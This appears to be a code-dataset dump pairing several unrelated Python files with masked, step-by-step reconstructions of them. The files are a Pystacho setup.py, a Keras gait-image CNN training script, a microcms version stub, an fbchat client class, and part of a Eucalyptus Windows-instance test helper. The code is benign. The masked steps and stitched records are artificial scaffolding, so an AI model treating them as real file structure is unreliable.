"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
],
# include_package_data=True,
)
|
normal
|
{
"blob_id": "d7e24730ce9f2835d55d3995abec2a7d00eb05ef",
"index": 9024,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(PATH / 'pystacho' / '__init__.py') as fp:\n for line in fp.readlines():\n if line.startswith('__version__ = '):\n VERSION = line.split('=', 1)[-1].replace('\"', '').strip()\n break\nwith open('README.md') as fp:\n LONG_DESCRIPTION = fp.read()\nsetup(name='Pystacho', version=VERSION, description=\n 'ESCRIBIR DESCRIPCION DEL PROYECTO', long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown', author=[\n 'Francisco Fernandez', 'Benjamin Marcologno', 'Andrés Ruderman'],\n author_email='[email protected]', url=\n 'https://github.com/aruderman/pystacho', packages=['pystacho'], license\n ='The MIT License', install_requires=REQUIREMENTS, keywords=['pystacho'\n ], classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering'])\n",
"step-3": "<mask token>\nPATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))\nREQUIREMENTS = ['diskcache', 'numpy', 'pandas', 'matplotlib', 'pymatgen',\n 'seaborn', 'lightgbm', 'matminer', 'scikit-learn']\nwith open(PATH / 'pystacho' / '__init__.py') as fp:\n for line in fp.readlines():\n if line.startswith('__version__ = '):\n VERSION = line.split('=', 1)[-1].replace('\"', '').strip()\n break\nwith open('README.md') as fp:\n LONG_DESCRIPTION = fp.read()\nsetup(name='Pystacho', version=VERSION, description=\n 'ESCRIBIR DESCRIPCION DEL PROYECTO', long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown', author=[\n 'Francisco Fernandez', 'Benjamin Marcologno', 'Andrés Ruderman'],\n author_email='[email protected]', url=\n 'https://github.com/aruderman/pystacho', packages=['pystacho'], license\n ='The MIT License', install_requires=REQUIREMENTS, keywords=['pystacho'\n ], classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering'])\n",
"step-4": "<mask token>\nimport os\nimport pathlib\nfrom setuptools import setup\nPATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))\nREQUIREMENTS = ['diskcache', 'numpy', 'pandas', 'matplotlib', 'pymatgen',\n 'seaborn', 'lightgbm', 'matminer', 'scikit-learn']\nwith open(PATH / 'pystacho' / '__init__.py') as fp:\n for line in fp.readlines():\n if line.startswith('__version__ = '):\n VERSION = line.split('=', 1)[-1].replace('\"', '').strip()\n break\nwith open('README.md') as fp:\n LONG_DESCRIPTION = fp.read()\nsetup(name='Pystacho', version=VERSION, description=\n 'ESCRIBIR DESCRIPCION DEL PROYECTO', long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown', author=[\n 'Francisco Fernandez', 'Benjamin Marcologno', 'Andrés Ruderman'],\n author_email='[email protected]', url=\n 'https://github.com/aruderman/pystacho', packages=['pystacho'], license\n ='The MIT License', install_requires=REQUIREMENTS, keywords=['pystacho'\n ], classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering'])\n",
"step-5": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# This file is part of the\r\n# Pystacho Project (https://github.com/aruderman/pystacho/).\r\n# Copyright (c) 2021, Francisco Fernandez, Benjamin Marcologno, Andrés Ruderman\r\n# License: MIT\r\n# Full Text: https://github.com/aruderman/pystacho/blob/master/LICENSE\r\n\r\n# =====================================================================\r\n# DOCS\r\n# =====================================================================\r\n\r\n\"\"\"This file is for distribute and install Pystacho\"\"\"\r\n\r\n# ======================================================================\r\n# IMPORTS\r\n# ======================================================================\r\n\r\nimport os\r\nimport pathlib\r\n\r\nfrom setuptools import setup\r\n\r\n# =============================================================================\r\n# CONSTANTS\r\n# =============================================================================\r\n\r\nPATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))\r\n\r\n\r\nREQUIREMENTS = [\r\n \"diskcache\",\r\n \"numpy\",\r\n \"pandas\",\r\n \"matplotlib\",\r\n \"pymatgen\",\r\n \"seaborn\",\r\n \"lightgbm\",\r\n \"matminer\",\r\n \"scikit-learn\",\r\n]\r\n\r\nwith open(PATH / \"pystacho\" / \"__init__.py\") as fp:\r\n for line in fp.readlines():\r\n if line.startswith(\"__version__ = \"):\r\n VERSION = line.split(\"=\", 1)[-1].replace('\"', \"\").strip()\r\n break\r\n\r\n\r\nwith open(\"README.md\") as fp:\r\n LONG_DESCRIPTION = fp.read()\r\n\r\n\r\n# =============================================================================\r\n# FUNCTIONS\r\n# =============================================================================\r\n\r\nsetup(\r\n name=\"Pystacho\",\r\n version=VERSION,\r\n description=\"ESCRIBIR DESCRIPCION DEL PROYECTO\",\r\n long_description=LONG_DESCRIPTION,\r\n long_description_content_type=\"text/markdown\",\r\n author=[\"Francisco Fernandez\", \"Benjamin Marcologno\", \"Andrés Ruderman\"],\r\n author_email=\"[email protected]\",\r\n url=\"https://github.com/aruderman/pystacho\",\r\n packages=[\"pystacho\"],\r\n license=\"The MIT License\",\r\n install_requires=REQUIREMENTS,\r\n keywords=[\"pystacho\"],\r\n classifiers=[\r\n \"Development Status :: 4 - Beta\",\r\n \"Intended Audience :: Education\",\r\n \"Intended Audience :: Science/Research\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n \"Programming Language :: Python\",\r\n \"Programming Language :: Python :: 3.8\",\r\n \"Programming Language :: Python :: Implementation :: CPython\",\r\n \"Topic :: Scientific/Engineering\",\r\n ],\r\n # include_package_data=True,\r\n)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
np.random.seed(7)
<|reserved_special_token_0|>
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
<|reserved_special_token_0|>
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
<|reserved_special_token_0|>
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',
activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
<|reserved_special_token_0|>
print('Test loss : ', score[0])
print('Test Accuracy : ', score[1])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
np.random.seed(7)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.8
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
x_train = []
y_train = []
x_test = []
y_test = []
path = './200305_gei'
list = os.listdir(path)
i = 0
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
x_train, x_test, y_train, y_test = train_test_split(x_train, y_train,
test_size=0.2)
input_shape = 128, 96, 1
batch_size = 128
num_classes = 128
epochs = 100
x_train = np.array(x_train)
x_test = np.array(x_test)
y_train = np.array(y_train)
y_test = np.array(y_test)
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',
activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
history = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,
verbose=1, validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss : ', score[0])
print('Test Accuracy : ', score[1])
<|reserved_special_token_1|>
import sys
import os
import tensorflow as tf
import keras
from cv2 import *
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from PIL import Image
import numpy as np
import pickle
from sklearn.model_selection import train_test_split
from keras.utils import np_utils
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from keras.callbacks import ModelCheckpoint, EarlyStopping
np.random.seed(7)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.8
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
x_train = []
y_train = []
x_test = []
y_test = []
path = './200305_gei'
list = os.listdir(path)
i = 0
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
x_train, x_test, y_train, y_test = train_test_split(x_train, y_train,
test_size=0.2)
input_shape = 128, 96, 1
batch_size = 128
num_classes = 128
epochs = 100
x_train = np.array(x_train)
x_test = np.array(x_test)
y_train = np.array(y_train)
y_test = np.array(y_test)
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',
activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
history = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,
verbose=1, validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss : ', score[0])
print('Test Accuracy : ', score[1])
<|reserved_special_token_1|>
import sys
import os
import tensorflow as tf
import keras
from cv2 import *
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from PIL import Image
import numpy as np
import pickle
from sklearn.model_selection import train_test_split
from keras.utils import np_utils
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from keras.callbacks import ModelCheckpoint, EarlyStopping
np.random.seed(7)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.8
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
x_train = []
y_train = []
x_test = []
y_test = []
path = './200305_gei'
list = os.listdir(path)
i = 0
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
x_train, x_test, y_train, y_test = train_test_split(x_train, y_train,test_size=0.2)
input_shape = (128, 96, 1)
batch_size = 128
num_classes = 128
epochs = 100
x_train = np.array(x_train)
x_test = np.array(x_test)
y_train = np.array(y_train)
y_test = np.array(y_test)
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(5,5), strides=(1,1), padding='same', activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))
model.add(Conv2D(64, kernel_size=(2,2), strides=(1,1), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print("Test loss : ", score[0])
print("Test Accuracy : ", score[1])
|
flexible
|
{
"blob_id": "0681ab83843187701ac72018b6078f5141bf22e0",
"index": 3663,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nnp.random.seed(7)\n<mask token>\ntf.keras.backend.set_session(tf.Session(config=config))\nnp.set_printoptions(threshold=np.nan)\n<mask token>\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\n<mask token>\nmodel.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',\n activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',\n activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[\n 'accuracy'])\n<mask token>\nprint('Test loss : ', score[0])\nprint('Test Accuracy : ', score[1])\n",
"step-3": "<mask token>\nnp.random.seed(7)\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.8\ntf.keras.backend.set_session(tf.Session(config=config))\nnp.set_printoptions(threshold=np.nan)\nx_train = []\ny_train = []\nx_test = []\ny_test = []\npath = './200305_gei'\nlist = os.listdir(path)\ni = 0\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\nx_train, x_test, y_train, y_test = train_test_split(x_train, y_train,\n test_size=0.2)\ninput_shape = 128, 96, 1\nbatch_size = 128\nnum_classes = 128\nepochs = 100\nx_train = np.array(x_train)\nx_test = np.array(x_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\nx_train = np.expand_dims(x_train, axis=3)\nx_test = np.expand_dims(x_test, axis=3)\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',\n activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',\n activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[\n 'accuracy'])\nhistory = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,\n verbose=1, validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss : ', score[0])\nprint('Test Accuracy : ', score[1])\n",
"step-4": "import sys\nimport os\nimport tensorflow as tf\nimport keras\nfrom cv2 import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom PIL import Image\nimport numpy as np\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nnp.random.seed(7)\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.8\ntf.keras.backend.set_session(tf.Session(config=config))\nnp.set_printoptions(threshold=np.nan)\nx_train = []\ny_train = []\nx_test = []\ny_test = []\npath = './200305_gei'\nlist = os.listdir(path)\ni = 0\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\nx_train, x_test, y_train, y_test = train_test_split(x_train, y_train,\n test_size=0.2)\ninput_shape = 128, 96, 1\nbatch_size = 128\nnum_classes = 128\nepochs = 100\nx_train = np.array(x_train)\nx_test = np.array(x_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\nx_train = np.expand_dims(x_train, axis=3)\nx_test = np.expand_dims(x_test, axis=3)\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',\n activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',\n activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[\n 'accuracy'])\nhistory = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,\n verbose=1, validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss : ', score[0])\nprint('Test Accuracy : ', score[1])\n",
"step-5": "import sys\nimport os\nimport tensorflow as tf\nimport keras\nfrom cv2 import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom PIL import Image\nimport numpy as np\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nnp.random.seed(7)\n\nconfig = tf.ConfigProto()\n\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.8\n\ntf.keras.backend.set_session(tf.Session(config=config))\n\nnp.set_printoptions(threshold=np.nan)\nx_train = []\ny_train = []\nx_test = []\ny_test = []\n\npath = './200305_gei'\nlist = os.listdir(path)\ni = 0\n\n\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\n\n\n\nx_train, x_test, y_train, y_test = train_test_split(x_train, y_train,test_size=0.2)\n\ninput_shape = (128, 96, 1)\n\nbatch_size = 128\nnum_classes = 128\nepochs = 100\n\nx_train = np.array(x_train)\nx_test = np.array(x_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\n\nx_train = np.expand_dims(x_train, axis=3)\nx_test = np.expand_dims(x_test, axis=3)\n\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5,5), strides=(1,1), padding='same', activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))\nmodel.add(Conv2D(64, kernel_size=(2,2), strides=(1,1), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\n\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Test loss : \", score[0])\nprint(\"Test Accuracy : \", score[1])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""microcms package, minimalistic flatpage enhancement.
THIS SOFTWARE IS UNDER BSD LICENSE.
Copyright (c) 2010-2012 Daniele Tricoli <[email protected]>
Read LICENSE for more informations.
"""
VERSION = (0, 2, 0)
|
normal
|
{
"blob_id": "3e1c2d0c5bb30d093a99f10020af14db5436bf02",
"index": 5551,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nVERSION = 0, 2, 0\n",
"step-3": "# -*- coding: utf-8 -*-\n\"\"\"microcms package, minimalistic flatpage enhancement.\n\nTHIS SOFTWARE IS UNDER BSD LICENSE.\nCopyright (c) 2010-2012 Daniele Tricoli <[email protected]>\n\nRead LICENSE for more informations.\n\"\"\"\nVERSION = (0, 2, 0)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from fbchat import Client
class IBehaviourBase(Client):
BreakFlag = False
def __init__(self,email,password, kwargs):
""""abstract class being parent of every user implemented behaviour;
it handles logging in and tasks on behaviour loader side"""
self.kwargs=kwargs
Client.__init__(self, email=email, password=password)
self.Run()
def Run(self):
print("behaviour base abstract method invoked error")
## todo add exception here
|
normal
|
{
"blob_id": "e67f27eec53901f27ba5a7ee7e2a20bbb1e8f7f9",
"index": 2237,
"step-1": "<mask token>\n\n\nclass IBehaviourBase(Client):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass IBehaviourBase(Client):\n <mask token>\n\n def __init__(self, email, password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs = kwargs\n Client.__init__(self, email=email, password=password)\n self.Run()\n\n def Run(self):\n print('behaviour base abstract method invoked error')\n",
"step-3": "<mask token>\n\n\nclass IBehaviourBase(Client):\n BreakFlag = False\n\n def __init__(self, email, password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs = kwargs\n Client.__init__(self, email=email, password=password)\n self.Run()\n\n def Run(self):\n print('behaviour base abstract method invoked error')\n",
"step-4": "from fbchat import Client\n\n\nclass IBehaviourBase(Client):\n BreakFlag = False\n\n def __init__(self, email, password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs = kwargs\n Client.__init__(self, email=email, password=password)\n self.Run()\n\n def Run(self):\n print('behaviour base abstract method invoked error')\n",
"step-5": "from fbchat import Client\nclass IBehaviourBase(Client):\n BreakFlag = False\n def __init__(self,email,password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs=kwargs\n Client.__init__(self, email=email, password=password)\n\n self.Run()\n\n def Run(self):\n print(\"behaviour base abstract method invoked error\")\n ## todo add exception here\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# Software License Agreement (BSD License)
#
# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Redistribution and use of this software in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: [email protected]
'''
@author: clarkmatthew
extension of the boto instance class, with added convenience methods + objects
Add common instance test routines to this class
Examples:
from eucaops import Eucaops
from nephoria.windows_instance import WinInstance
tester = Eucaops(credpath='eucarc-10.111.5.80-eucalyptus-sys_admin')
wins = WinInstance.make_euinstance_from_instance(tester.get_instances(idstring='i-89E13DA8')[0], tester=tester, keypair='test')
vol = tester.get_volume(status='available', zone=wins.placement)
wins.attach_volume(vol)
'''
import socket
import os
import re
import time
import copy
import types
import operator
from prettytable import PrettyTable, ALL
from boto.ec2.instance import Instance
from nephoria.aws.ec2.euvolume import EuVolume
from cloud_utils.log_utils import eulogger, get_line, markup
from nephoria.euca.taggedresource import TaggedResource
from boto.ec2.instance import InstanceState
from datetime import datetime
from cloud_utils.net_utils import winrm_connection
termline = get_line()
class WinInstanceDiskType():
gigabyte = 1073741824
megabyte = 1048576
def __init__(self, win_instance, wmic_dict):
self.check_dict_requires(wmic_dict)
self.__dict__ = self.convert_numbers_in_dict(copy.copy(wmic_dict))
self.win_instance = win_instance
self.size_in_gb = self.get_size_in_gb()
self.size_in_mb = self.get_size_in_mb()
self.size = long(self.size or 0)
self.last_updated = time.time()
self.setup()
def setup(self):
raise Exception('Not Implemented')
def check_dict_requires(self, wmic_dict):
raise Exception('Not Implemented')
def convert_numbers_in_dict(self, dict):
#convert strings representing numbers to ints
for key in dict:
value = str(dict[key])
if (re.search("\S", str(dict[key])) and not re.search("\D", str(dict[key]))):
dict[key] = long(dict[key])
return dict
def get_partition_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.append(part.deviceid)
return retlist
def get_logicaldisk_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.extend(part.get_logicaldisk_ids())
return retlist
def get_size_in_gb(self):
'''
Attempts to convert self.size from bytes to gigabytes as well as round up > .99 to account for a differences
in how the size is represented
'''
self.size = int(self.size or 0)
gigs = self.size / self.gigabyte
if (self.size % self.gigabyte) /float(self.gigabyte) > .99:
gigs += 1
return gigs
def get_size_in_mb(self):
'''
Attempts to convert self.size from bytes to gigabytes as well as round up > .99 to account for a differences
in how the size is represented
'''
self.size = int(self.size or 0)
mb = self.size / self.megabyte
if (self.size % self.megabyte) /float(self.megabyte) > .99:
mb += 1
return mb
def print_self(self):
self.get_summary(printmethod=self.win_instance.debug)
def get_summary(self, printheader=True, printmethod=None):
raise Exception('Method not implemented')
def print_self_full(self, printmethod=None):
'''
formats and prints self.dict
'''
self.win_instance.print_dict(dict=self.__dict__, printmethod=printmethod)
class WinInstanceDiskDrive(WinInstanceDiskType):
def setup(self):
if not hasattr(self, 'serialnumber'):
self.serialnumber = ''
if not hasattr(self, 'caption'):
self.caption = ''
if hasattr(self, 'model'):
self.caption = self.model
else:
self.model = self.caption
self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(windisk=self)
self.update_ebs_info()
self.disk_partitions = []
def check_dict_requires(self, wmic_dict):
if not ('deviceid' in wmic_dict and
'size' in wmic_dict and
('caption' in wmic_dict or 'model in wmic_dict') and
'index' in wmic_dict):
raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, caption, and index')
def get_partition_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.append(part.deviceid)
return retlist
def get_logicaldisk_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.extend(part.get_logicaldisk_ids())
return retlist
def update_md5_info_from_ebs(self):
self.md5 = None
self.md5len = None
for vol in self.win_instance.attached_vols:
if vol.guestdev == self.deviceid:
if not vol.md5:
vol.md5len = 1024
vol.md5 = self.win_instance.get_dev_md5(self.cygwin_scsi_drive, vol.md5len)
self.md5 = vol.md5
self.md5len = vol.md5len
break
def update_ebs_info_from_serial_number(self):
